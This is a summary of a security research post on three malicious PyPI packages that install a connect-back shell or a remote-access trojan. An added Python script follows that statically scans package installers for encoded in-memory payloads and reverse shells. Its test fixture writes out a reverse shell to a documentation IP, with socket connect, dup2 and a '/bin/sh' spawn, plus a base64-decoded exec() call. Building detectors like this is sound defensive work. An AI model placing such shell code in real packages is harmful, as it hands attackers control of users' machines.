Company
Date Published
Author
Andrey Polkovnychenko and Shachar Menashe
Word count
631
Language
English
Hacker News points
None

Summary

The JFrog Security research team continuously monitors open source software repositories to detect and prevent software supply chain attacks, reporting findings to repository maintainers and the community. Among the team's recent discoveries are three malicious packages in the PyPI repository, which were removed quickly after being identified as threats. The packages, named "hipid," "hpid," and "ecopower," give attackers full control over infected machines. "hipid" and "hpid" pose as tools for hiding processes on Linux, but actually drop a connect-back shell that targets Linux. "ecopower" executes the Medusa Python RAT, which gives the attacker extensive control over the infected machine, including the ability to download and execute arbitrary code. These findings illustrate the techniques malware authors use to evade detection, such as uncommon encoding schemes and in-memory payload execution.
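The two evasion techniques the summary names, uncommon encoding and in-memory execution, leave a recognisable shape in a package's installer: a string blob that is decoded and passed straight to exec(), and, for a connect-back shell, a socket connect followed by os.dup2 and a shell spawn. The following static triage script is an added example, not code from the JFrog post or from the packages it describes. It parses a setup.py with the ast module and flags those shapes. The sample setup.py it scans is constructed for illustration (the "blob" is a placeholder, the address is a documentation-only TEST-NET-3 address) and is parsed, never executed; the decoder list, the shell-call list and the entropy threshold are my own assumptions about what is worth flagging.

```python
"""Static triage of a Python package installer for two behaviours: a payload
decoded and executed in memory, and a connect-back shell. Heuristic only;
it produces candidates for manual review. The input is parsed, never run."""
from __future__ import annotations

import ast
import math
from collections import Counter

# Assumed: decoder/decompressor names whose output feeding exec()/eval()
# suggests a hidden payload (base64 family, zlib, marshal, hex, codecs).
DECODERS = {
    "b64decode", "b32decode", "b16decode", "a85decode", "b85decode",
    "decompress", "fromhex", "unhexlify", "loads", "decode",
}
# Assumed: call names that together form a classic Linux connect-back shell.
SHELL_SPAWNERS = {"spawn", "Popen", "call", "system", "execv", "execvp"}


def _call_name(node: ast.Call) -> str:
    """Bare name of a call target: os.dup2(...) -> 'dup2', exec(...) -> 'exec'."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def _contains_decoder(node: ast.AST) -> bool:
    """True if any call inside `node` is one of the DECODERS."""
    return any(isinstance(n, ast.Call) and _call_name(n) in DECODERS
               for n in ast.walk(node))


def shannon_entropy(s: str) -> float:
    """Bits per character; English prose is ~4.1, base64 of random data ~5.5+."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_source(src: str) -> list[str]:
    """Return human-readable findings for one Python source file."""
    tree = ast.parse(src)
    findings: list[str] = []
    names_seen: set[str] = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            names_seen.add(name)
            # exec()/eval() whose argument is produced by a decoder chain.
            if name in {"exec", "eval"} and any(_contains_decoder(a) for a in node.args):
                findings.append(f"line {node.lineno}: {name}() on decoded data (in-memory payload)")
        elif isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
            text = node.value if isinstance(node.value, str) else node.value.decode("latin-1")
            # Assumed threshold: long literals with entropy above prose look encoded.
            if len(text) >= 64 and shannon_entropy(text) > 4.5:
                findings.append(f"line {node.lineno}: high-entropy string literal ({len(text)} chars)")
    # socket.socket(...) + .connect(...) + os.dup2(...) + a shell spawner.
    if {"socket", "connect", "dup2"} <= names_seen and names_seen & SHELL_SPAWNERS:
        findings.append("socket.connect + os.dup2 + shell spawn: connect-back shell pattern")
    return findings


# Constructed sample resembling the pattern described above. Not the real
# hipid/hpid/ecopower code; the blob is a placeholder and is never decoded here.
SAMPLE_SETUP_PY = '''
from setuptools import setup
import base64, codecs, os, pty, socket

blob = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
exec(base64.b64decode(codecs.decode(blob, "rot13")))

def _phone_home():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("203.0.113.10", 4444))   # TEST-NET-3, documentation address
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    pty.spawn("/bin/sh")

setup(name="example-pkg", version="0.0.1")
'''

# Constructed benign installer used as a control.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="clean-pkg", version="1.0", description="A small utility.")
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(label, scan_source(src) or ["no findings"])
```

Run it against an unpacked sdist's setup.py (and any module it imports at install time) before installing; a hit is a reason to read the file, not proof of malice, since legitimate packages occasionally embed compressed data. The three indicators deliberately require a combination of calls rather than a single import, because socket or base64 alone appear in plenty of clean code.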